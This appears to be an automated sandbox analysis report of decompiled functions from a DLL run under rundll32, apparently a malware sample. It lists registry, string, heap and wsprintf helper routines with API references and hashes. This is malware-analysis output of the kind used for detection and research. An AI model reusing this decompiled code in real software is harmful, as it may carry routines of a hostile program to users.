                                • Opcode Fuzzy Hash: cc1942b27f5e544b503ba1d68c4a69a00e6f2ceb003b29edbc9d5cc3272fa4fe
                                • Instruction Fuzzy Hash: 21218772D00119EFDB20BFECC884CDE77FEAB44258B054466FBD1AB100E73599458BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E010612CA(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                                				long _t26;
                                				intOrPtr* _t38;
                                				char* _t42;
                                				long _t43;
                                
                                				if(_a4 == 0) {
                                					L2:
                                					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                                					_t43 = _t26;
                                					if(_t43 == 0) {
                                						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                                						if(_a4 == 0) {
                                							_t43 = 0xe8;
                                						} else {
                                							_t42 = E01066D63(_a4);
                                							if(_t42 == 0) {
                                								_t43 = 8;
                                							} else {
                                								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                                								if(_t43 != 0) {
                                									E01066C2C(_t42);
                                								} else {
                                									 *_a20 = _t42;
                                									_t38 = _a24;
                                									if(_t38 != 0) {
                                										 *_t38 = _a4;
                                									}
                                								}
                                							}
                                						}
                                						RegCloseKey(_a12); // executed
                                					}
                                					L12:
                                					return _t43;
                                				}
                                				_t43 = E01066500(_a4, _a8, _a12, _a16, _a20, _a24);
                                				if(_t43 == 0) {
                                					goto L12;
                                				}
                                				goto L2;
                                			}







                                0x010612d6
                                0x010612f9
                                0x01061303
                                0x01061309
                                0x0106130d
                                0x01061325
                                0x0106132a
                                0x01061372
                                0x0106132c
                                0x01061334
                                0x01061338
                                0x0106136f
                                0x0106133a
                                0x0106134c
                                0x01061350
                                0x01061366
                                0x01061352
                                0x01061355
                                0x01061357
                                0x0106135c
                                0x01061361
                                0x01061361
                                0x0106135c
                                0x01061350
                                0x01061338
                                0x0106137a
                                0x0106137a
                                0x01061381
                                0x01061387
                                0x01061387
                                0x010612ef
                                0x010612f3
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • RegOpenKeyW.ADVAPI32(80000002,05109E92,05109E92), ref: 01061303
                                • RegQueryValueExW.KERNEL32(05109E92,?,00000000,80000002,00000000,00000000,?,01063551,3D010690,80000002,01067168,00000000,01067168,?,05109E92,80000002), ref: 01061325
                                • RegQueryValueExW.ADVAPI32(05109E92,?,00000000,80000002,00000000,00000000,00000000,?,01063551,3D010690,80000002,01067168,00000000,01067168,?,05109E92), ref: 0106134A
                                • RegCloseKey.KERNEL32(05109E92,?,01063551,3D010690,80000002,01067168,00000000,01067168,?,05109E92,80000002,00000000,?), ref: 0106137A
                                  • Part of subcall function 01066500: SafeArrayDestroy.OLEAUT32(00000000), ref: 01066588
                                  • Part of subcall function 01066C2C: RtlFreeHeap.NTDLL(00000000,00000000,01065E1D,00000000,?,?,00000000), ref: 01066C38
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                • String ID:
                                • API String ID: 486277218-0
                                • Opcode ID: 7c4da08871d9b2d7a2c165dcff0910f38b8d2147fb080b5317a9145055593ac2
                                • Instruction ID: 542bc7a1d604dabc43a3a352a5e6037efbf45b35bcd12a80b5c4718db32106a5
                                • Opcode Fuzzy Hash: 7c4da08871d9b2d7a2c165dcff0910f38b8d2147fb080b5317a9145055593ac2
                                • Instruction Fuzzy Hash: 1F21397250012EBFDF11AF94DC80CEE7BADFB48290B008426FE9697520D632DD609BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 50%
                                			E0106765B(void** __esi) {
                                				intOrPtr _v0;
                                				intOrPtr _t4;
                                				intOrPtr _t6;
                                				void* _t8;
                                				void* _t9;
                                				intOrPtr _t10;
                                				void* _t11;
                                				void** _t13;
                                
                                				_t13 = __esi;
                                				_t4 =  *0x106a3cc; // 0x51095b0
                                				__imp__(_t4 + 0x40);
                                				while(1) {
                                					_t6 =  *0x106a3cc; // 0x51095b0
                                					_t1 = _t6 + 0x58; // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t8 =  *_t13;
                                				if(_t8 != 0 && _t8 != 0x106a030) {
                                					HeapFree( *0x106a2d8, 0, _t8);
                                				}
                                				_t9 = E01066E6D(_v0, _t13); // executed
                                				_t13[1] = _t9;
                                				_t10 =  *0x106a3cc; // 0x51095b0
                                				_t11 = _t10 + 0x40;
                                				__imp__(_t11);
                                				return _t11;
                                			}











                                0x0106765b
                                0x0106765b
                                0x01067664
                                0x01067674
                                0x01067674
                                0x01067679
                                0x0106767e
                                0x00000000
                                0x00000000
                                0x0106766e
                                0x0106766e
                                0x01067680
                                0x01067684
                                0x01067696
                                0x01067696
                                0x010676a1
                                0x010676a6
                                0x010676a9
                                0x010676ae
                                0x010676b2
                                0x010676b8

                                APIs
                                • RtlEnterCriticalSection.NTDLL(05109570), ref: 01067664
                                • Sleep.KERNEL32(0000000A), ref: 0106766E
                                • HeapFree.KERNEL32(00000000,00000000), ref: 01067696
                                • RtlLeaveCriticalSection.NTDLL(05109570), ref: 010676B2
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: 26b45d9ede0a4b195cad3510150d44b2f17af9c5ae0964989bc0e093d759c79f
                                • Instruction ID: a897aec3fea3eadad266a15a0f073a1a376a4d5db7b77864a80009653ea5c71c
                                • Opcode Fuzzy Hash: 26b45d9ede0a4b195cad3510150d44b2f17af9c5ae0964989bc0e093d759c79f
                                • Instruction Fuzzy Hash: BBF0D470300242EFEB30AB6CDD48F1A3BE8AB14748B048544F6C6E7275C67AE840CB15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0106216C(void* __edx) {
                                				void* _v8;
                                				int _v12;
                                				WCHAR* _v16;
                                				void* __edi;
                                				void* __esi;
                                				void* _t23;
                                				intOrPtr _t24;
                                				void* _t26;
                                				intOrPtr _t32;
                                				intOrPtr _t35;
                                				void* _t37;
                                				intOrPtr _t38;
                                				void* _t40;
                                				intOrPtr _t42;
                                				void* _t45;
                                				void* _t50;
                                				void* _t52;
                                
                                				_t50 = __edx;
                                				_v12 = 0;
                                				_t23 = E01063695(0,  &_v8); // executed
                                				if(_t23 != 0) {
                                					_v8 = 0;
                                				}
                                				_t24 =  *0x106a348; // 0x409d5a8
                                				_t4 = _t24 + 0x106be58; // 0x5109400
                                				_t5 = _t24 + 0x106be00; // 0x4f0053
                                				_t26 = E0106155C( &_v16, _v8, _t5, _t4); // executed
                                				_t45 = _t26;
                                				if(_t45 == 0) {
                                					StrToIntExW(_v16, 0,  &_v12);
                                					_t45 = 8;
                                					if(_v12 < _t45) {
                                						_t45 = 1;
                                						__eflags = 1;
                                					} else {
                                						_t32 =  *0x106a348; // 0x409d5a8
                                						_t11 = _t32 + 0x106be4c; // 0x51093f4
                                						_t48 = _t11;
                                						_t12 = _t32 + 0x106be00; // 0x4f0053
                                						_t52 = E010628C4(_t11, _t12, _t11);
                                						_t59 = _t52;
                                						if(_t52 != 0) {
                                							_t35 =  *0x106a348; // 0x409d5a8
                                							_t13 = _t35 + 0x106ba51; // 0x30314549
                                							_t37 = E010641FA(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                							if(_t37 == 0) {
                                								_t61 =  *0x106a2fc - 6;
                                								if( *0x106a2fc <= 6) {
                                									_t42 =  *0x106a348; // 0x409d5a8
                                									_t15 = _t42 + 0x106bde2; // 0x52384549
                                									E010641FA(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                								}
                                							}
                                							_t38 =  *0x106a348; // 0x409d5a8
                                							_t17 = _t38 + 0x106be90; // 0x5109438
                                							_t18 = _t38 + 0x106be68; // 0x680043
                                							_t40 = E010674B6(_v8, 0x80000001, _t52, _t18, _t17); // executed
                                							_t45 = _t40;
                                							HeapFree( *0x106a2d8, 0, _t52);
                                						}
                                					}
                                					HeapFree( *0x106a2d8, 0, _v16);
                                				}
                                				_t54 = _v8;
                                				if(_v8 != 0) {
                                					E01063AC2(_t54);
                                				}
                                				return _t45;
                                			}




















                                0x0106216c
                                0x0106217c
                                0x0106217f
                                0x01062186
                                0x01062188
                                0x01062188
                                0x0106218b
                                0x01062190
                                0x01062197
                                0x010621a4
                                0x010621a9
                                0x010621ad
                                0x010621bb
                                0x010621c9
                                0x010621cd
                                0x0106225e
                                0x0106225e
                                0x010621d3
                                0x010621d3
                                0x010621d8
                                0x010621d8
                                0x010621df
                                0x010621eb
                                0x010621ed
                                0x010621ef
                                0x010621f1
                                0x010621f8
                                0x01062203
                                0x0106220a
                                0x0106220c
                                0x01062213
                                0x01062215
                                0x0106221c
                                0x01062227
                                0x01062227
                                0x01062213
                                0x0106222c
                                0x01062231
                                0x01062238
                                0x01062248
                                0x01062256
                                0x01062258
                                0x01062258
                                0x010621ef
                                0x0106226a
                                0x0106226a
                                0x0106226c
                                0x01062271
                                0x01062273
                                0x01062273
                                0x0106227e

                                APIs
                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05109400,00000000,?,76DDF710,00000000,76DDF730), ref: 010621BB
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05109438,?,00000000,30314549,00000014,004F0053,051093F4), ref: 01062258
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,010666BE), ref: 0106226A
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 68cc8f1f1c8af197700b9f771b66a0d7fe81c695849f7f54a3fc79b05bc87a67
                                • Instruction ID: 41ffbcbe5d9fa5c4c3e97346ac18e745789292b6beb9a16ef7efc421743a08b3
                                • Opcode Fuzzy Hash: 68cc8f1f1c8af197700b9f771b66a0d7fe81c695849f7f54a3fc79b05bc87a67
                                • Instruction Fuzzy Hash: D8318172A0011AFFDB21EF94DC48EDA7BFDEB48B00F044065F684EB161D6B29A489B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E010643EB(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                                				void* _v8;
                                				char _v48;
                                				void* __edi;
                                				intOrPtr _t22;
                                				intOrPtr _t30;
                                				intOrPtr _t34;
                                				intOrPtr* _t42;
                                				void* _t43;
                                				void* _t46;
                                				intOrPtr* _t48;
                                				void* _t49;
                                				intOrPtr _t51;
                                
                                				_t42 = _a16;
                                				_t48 = __eax;
                                				_t22 =  *0x106a348; // 0x409d5a8
                                				_t2 = _t22 + 0x106b67a; // 0x657a6973
                                				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
                                				if( *0x106a2ec >= 5) {
                                					_t30 = E010656C8(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
                                					L5:
                                					_a4 = _t30;
                                					L6:
                                					if(_a4 != 0) {
                                						L9:
                                						 *0x106a2ec =  *0x106a2ec + 1;
                                						L10:
                                						return _a4;
                                					}
                                					_t50 = _a16;
                                					 *_t48 = _a16;
                                					_t49 = _v8;
                                					 *_t42 = E0106708D(_t50, _t49); // executed
                                					_t34 = E01062B23(_t49, _t50); // executed
                                					if(_t34 != 0) {
                                						 *_a8 = _t49;
                                						 *_a12 = _t34;
                                						if( *0x106a2ec < 5) {
                                							 *0x106a2ec =  *0x106a2ec & 0x00000000;
                                						}
                                						goto L10;
                                					}
                                					_a4 = 0xbf;
                                					E0106561E();
                                					HeapFree( *0x106a2d8, 0, _t49);
                                					goto L9;
                                				}
                                				_t51 =  *0x106a3e0; // 0x5109b78
                                				if(RtlAllocateHeap( *0x106a2d8, 0, 0x800) == 0) {
                                					_a4 = 8;
                                					goto L6;
                                				}
                                				_t30 = E0106300E(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
                                				goto L5;
                                			}















                                0x010643f2
                                0x010643f9
                                0x010643fd
                                0x01064402
                                0x0106440d
                                0x0106441d
                                0x0106446c
                                0x01064471
                                0x01064471
                                0x01064474
                                0x01064478
                                0x010644b2
                                0x010644b2
                                0x010644b8
                                0x010644bf
                                0x010644bf
                                0x0106447a
                                0x0106447d
                                0x0106447f
                                0x0106448c
                                0x0106448e
                                0x01064495
                                0x010644cc
                                0x010644d1
                                0x010644d3
                                0x010644d5
                                0x010644d5
                                0x00000000
                                0x010644d3
                                0x01064497
                                0x0106449e
                                0x010644ac
                                0x00000000
                                0x010644ac
                                0x0106441f
                                0x0106443a
                                0x01064454
                                0x00000000
                                0x01064454
                                0x0106444d
                                0x00000000

                                APIs
                                • wsprintfA.USER32 ref: 0106440D
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01064432
                                  • Part of subcall function 0106300E: GetTickCount.KERNEL32 ref: 01063025
                                  • Part of subcall function 0106300E: wsprintfA.USER32 ref: 01063072
                                  • Part of subcall function 0106300E: wsprintfA.USER32 ref: 0106308F
                                  • Part of subcall function 0106300E: wsprintfA.USER32 ref: 010630B1
                                  • Part of subcall function 0106300E: wsprintfA.USER32 ref: 010630D8
                                  • Part of subcall function 0106300E: wsprintfA.USER32 ref: 01063103
                                  • Part of subcall function 0106300E: HeapFree.KERNEL32(00000000,?), ref: 01063116
                                  • Part of subcall function 0106300E: wsprintfA.USER32 ref: 01063135
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 010644AC
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: wsprintf$Heap$Free$AllocateCountTick
                                • String ID:
                                • API String ID: 1307794992-0
                                • Opcode ID: 72aa8d07acebc042ad6165733842f1b524c623cb7964e8e1f88366e04f0c6cb0
                                • Instruction ID: bbd3150278b0a3f39e42b49b7b52423e1c4d35fe15a08ec261c4392c35cf103f
                                • Opcode Fuzzy Hash: 72aa8d07acebc042ad6165733842f1b524c623cb7964e8e1f88366e04f0c6cb0
                                • Instruction Fuzzy Hash: 0E311E7160021AEFDB11EF58D884EDA3BBCFB08354F108022F985E7261DB75E955CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 79%
                                			E01063B58(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                                				char _v5;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				char _t28;
                                				void* _t33;
                                				void* _t38;
                                				void* _t45;
                                				char* _t46;
                                				void* _t48;
                                				char* _t56;
                                				char* _t57;
                                				intOrPtr _t59;
                                				void* _t60;
                                
                                				_t56 = _a4;
                                				_t60 = __eax;
                                				_v12 = 0xb;
                                				if(_t56 != 0 && __eax != 0) {
                                					_t5 = _t60 - 1; // -1
                                					_t46 =  &(_t56[_t5]);
                                					_t28 =  *_t46;
                                					_v5 = _t28;
                                					 *_t46 = 0;
                                					__imp__(_a8, _t45);
                                					_v16 = _t28;
                                					_t57 = StrStrA(_t56, _a8);
                                					if(_t57 != 0) {
                                						 *_t46 = _v5;
                                						_t33 = RtlAllocateHeap( *0x106a2d8, 0, _a16 + _t60); // executed
                                						_t48 = _t33;
                                						if(_t48 == 0) {
                                							_v12 = 8;
                                						} else {
                                							_t58 = _t57 - _a4;
                                							E01067A1E(_t57 - _a4, _a4, _t48);
                                							_t38 = E01067A1E(_a16, _a12, _t58 + _t48);
                                							_t53 = _v16;
                                							_t59 = _a16;
                                							E01067A1E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
                                							 *_a20 = _t48;
                                							_v12 = _v12 & 0x00000000;
                                							 *_a24 = _t60 - _v16 + _t59;
                                						}
                                					}
                                				}
                                				return _v12;
                                			}
















                                0x01063b60
                                0x01063b63
                                0x01063b65
                                0x01063b6e
                                0x01063b80
                                0x01063b80
                                0x01063b84
                                0x01063b86
                                0x01063b89
                                0x01063b8c
                                0x01063b95
                                0x01063b9f
                                0x01063ba3
                                0x01063ba8
                                0x01063bb8
                                0x01063bbe
                                0x01063bc2
                                0x01063c11
                                0x01063bc4
                                0x01063bc4
                                0x01063bcd
                                0x01063bdc
                                0x01063be1
                                0x01063bee
                                0x01063bf7
                                0x01063c02
                                0x01063c09
                                0x01063c0d
                                0x01063c0d
                                0x01063bc2
                                0x01063c18
                                0x01063c1f

                                APIs
                                • lstrlen.KERNEL32(76DDF710,?,00000000,?,76DDF710), ref: 01063B8C
                                • StrStrA.SHLWAPI(00000000,?), ref: 01063B99
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 01063BB8
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 556738718-0
                                • Opcode ID: 30f5c69bc28f946370f82a8973ee02b7d3aebffd97d0188dfe2a5ee674ea2160
                                • Instruction ID: 46e4df0c6cece4cc3766accc1510376e3e604c49e3e8b186a7220cf08b9c49c7
                                • Opcode Fuzzy Hash: 30f5c69bc28f946370f82a8973ee02b7d3aebffd97d0188dfe2a5ee674ea2160
                                • Instruction Fuzzy Hash: F1218E3560024AAFDB119F6DC884B9EBFB9EF85214F088150FC88AB309C735E955CBE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 47%
                                			E01066E6D(char* _a4, char** _a8) {
                                				char* _t7;
                                				char* _t11;
                                				char* _t14;
                                				char* _t16;
                                				char* _t17;
                                				char _t18;
                                				signed int _t20;
                                				signed int _t22;
                                
                                				_t16 = _a4;
                                				_push(0x20);
                                				_t20 = 1;
                                				_push(_t16);
                                				while(1) {
                                					_t7 = StrChrA();
                                					if(_t7 == 0) {
                                						break;
                                					}
                                					_t20 = _t20 + 1;
                                					_push(0x20);
                                					_push( &(_t7[1]));
                                				}
                                				_t11 = E01066D63(_t20 << 2);
                                				_a4 = _t11;
                                				if(_t11 != 0) {
                                					StrTrimA(_t16, 0x1069284); // executed
                                					_t22 = 0;
                                					do {
                                						_t14 = StrChrA(_t16, 0x20);
                                						if(_t14 != 0) {
                                							 *_t14 = 0;
                                							do {
                                								_t14 =  &(_t14[1]);
                                								_t18 =  *_t14;
                                							} while (_t18 == 0x20 || _t18 == 9);
                                						}
                                						_t17 = _a4;
                                						 *(_t17 + _t22 * 4) = _t16;
                                						_t22 = _t22 + 1;
                                						_t16 = _t14;
                                					} while (_t14 != 0);
                                					 *_a8 = _t17;
                                				}
                                				return 0;
                                			}











                                0x01066e71
                                0x01066e7e
                                0x01066e80
                                0x01066e81
                                0x01066e89
                                0x01066e89
                                0x01066e8d
                                0x00000000
                                0x00000000
                                0x01066e84
                                0x01066e85
                                0x01066e88
                                0x01066e88
                                0x01066e95
                                0x01066e9a
                                0x01066e9f
                                0x01066ea7
                                0x01066ead
                                0x01066eaf
                                0x01066eb2
                                0x01066eb6
                                0x01066eb8
                                0x01066ebb
                                0x01066ebb
                                0x01066ebc
                                0x01066ebe
                                0x01066ebb
                                0x01066ec8
                                0x01066ecb
                                0x01066ece
                                0x01066ecf
                                0x01066ed1
                                0x01066ed8
                                0x01066ed8
                                0x01066ee4

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,051095AC,?,?,010676A6,?,051095AC), ref: 01066E89
                                • StrTrimA.SHLWAPI(?,01069284,00000002,?,010676A6,?,051095AC), ref: 01066EA7
                                • StrChrA.SHLWAPI(?,00000020,?,010676A6,?,051095AC), ref: 01066EB2
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: ac0db6a8ff169ed2b0d02d8b8411830d99dcbe45c05abbd823ea85a1a3b156c8
                                • Instruction ID: 882770163517424e58f17abd9c706b97f3e90f8aca2d02e687ad657c15adfd04
                                • Opcode Fuzzy Hash: ac0db6a8ff169ed2b0d02d8b8411830d99dcbe45c05abbd823ea85a1a3b156c8
                                • Instruction Fuzzy Hash: B601BC71700356AFE7605A2ACC88F677EDDEBC5780F040056EAD1CB282DA72C84287A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E01067928(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                				intOrPtr _v36;
                                				intOrPtr _v44;
                                				intOrPtr _v48;
                                				intOrPtr _v52;
                                				void _v60;
                                				char _v64;
                                				long _t14;
                                				intOrPtr _t18;
                                				intOrPtr _t19;
                                				intOrPtr _t26;
                                				intOrPtr _t27;
                                				long _t28;
                                
                                				_t27 = __edi;
                                				_t26 = _a8;
                                				_t14 = E01063F07(_a4, _t26, __edi); // executed
                                				_t28 = _t14;
                                				if(_t28 != 0) {
                                					memset( &_v60, 0, 0x38);
                                					_t18 =  *0x106a348; // 0x409d5a8
                                					_t28 = 0;
                                					_v64 = 0x3c;
                                					if(_a12 == 0) {
                                						_t7 = _t18 + 0x106b4e0; // 0x70006f
                                						_t19 = _t7;
                                					} else {
                                						_t6 = _t18 + 0x106b8f4; // 0x750072
                                						_t19 = _t6;
                                					}
                                					_v52 = _t19;
                                					_push(_t28);
                                					_v48 = _a4;
                                					_v44 = _t26;
                                					_v36 = _t27;
                                					E010623AA();
                                					_push( &_v64);
                                					if( *0x106a100() == 0) {
                                						_t28 = GetLastError();
                                					}
                                					_push(1);
                                					E010623AA();
                                				}
                                				return _t28;
                                			}















                                0x01067928
                                0x0106792f
                                0x01067938
                                0x0106793d
                                0x01067941
                                0x0106794b
                                0x01067950
                                0x01067955
                                0x0106795a
                                0x01067964
                                0x0106796e
                                0x0106796e
                                0x01067966
                                0x01067966
                                0x01067966
                                0x01067966
                                0x01067974
                                0x0106797a
                                0x0106797b
                                0x0106797e
                                0x01067981
                                0x01067984
                                0x0106798c
                                0x01067995
                                0x0106799d
                                0x0106799d
                                0x0106799f
                                0x010679a1
                                0x010679a1
                                0x010679ab

                                APIs
                                  • Part of subcall function 01063F07: SysAllocString.OLEAUT32(00000000), ref: 01063F61
                                  • Part of subcall function 01063F07: SysAllocString.OLEAUT32(0070006F), ref: 01063F75
                                  • Part of subcall function 01063F07: SysAllocString.OLEAUT32(00000000), ref: 01063F87
                                • memset.NTDLL ref: 0106794B
                                • GetLastError.KERNEL32 ref: 01067997
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: AllocString$ErrorLastmemset
                                • String ID: <
                                • API String ID: 3736384471-4251816714
                                • Opcode ID: 7def37993b27525088d713f8df8603c37e087bfb51d755278988052e4c62db18
                                • Instruction ID: 6f7e3969338d9dd1c57e9f9b49d41e9b3171dfe8f11387897968e4aa76714f69
                                • Opcode Fuzzy Hash: 7def37993b27525088d713f8df8603c37e087bfb51d755278988052e4c62db18
                                • Instruction Fuzzy Hash: B6014471900218AFD720EF98D844EDD7BFCBB08784F444165F984E7211D7709504CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E01062575(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                				int _v12;
                                				signed int _v16;
                                				void* _v20;
                                				signed char _v36;
                                				void* _t24;
                                				intOrPtr _t27;
                                				void* _t35;
                                				signed int _t38;
                                				signed char* _t46;
                                				int _t53;
                                				void* _t55;
                                				void* _t56;
                                				void* _t57;
                                
                                				_v16 = _v16 & 0x00000000;
                                				_t46 = _a4;
                                				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                                				_v12 = 0x110;
                                				_t24 = E01066D63(_t53);
                                				_a4 = _t24;
                                				if(_t24 != 0) {
                                					memcpy(_t24,  *0x106a378, 0x110);
                                					_t27 =  *0x106a37c; // 0x0
                                					_t57 = _t56 + 0xc;
                                					if(_t27 != 0) {
                                						_t51 = _a4;
                                						E0106138A(0x110, _a4, _a4, _t27, 0);
                                					}
                                					if(E01066BF2( &_v36) != 0) {
                                						_t35 = E01065FBB(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                                						if(_t35 == 0) {
                                							_t55 = _v20;
                                							_v36 =  *_t46;
                                							_t38 = E010613C7(_t55, _a8, _t51, _t46, _a12); // executed
                                							_v16 = _t38;
                                							 *(_t55 + 4) = _v36;
                                							memset(_t55, 0, _v12 - (_t46[4] & 0xf));
                                							_t57 = _t57 + 0xc;
                                							E01066C2C(_t55);
                                						}
                                					}
                                					memset(_a4, 0, _t53);
                                					E01066C2C(_a4);
                                				}
                                				return _v16;
                                			}
















                                0x0106257b
                                0x01062580
                                0x0106258d
                                0x01062590
                                0x01062593
                                0x01062598
                                0x0106259d
                                0x010625ab
                                0x010625b0
                                0x010625b5
                                0x010625ba
                                0x010625bc
                                0x010625c5
                                0x010625c5
                                0x010625d4
                                0x010625e9
                                0x010625f0
                                0x010625f7
                                0x010625fd
                                0x01062603
                                0x0106260b
                                0x01062611
                                0x01062621
                                0x01062626
                                0x0106262a
                                0x0106262a
                                0x010625f0
                                0x01062635
                                0x01062640
                                0x01062640
                                0x0106264c

                                APIs
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                • memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,01064493,?), ref: 010625AB
                                • memset.NTDLL ref: 01062621
                                • memset.NTDLL ref: 01062635
                                Memory Dump Source
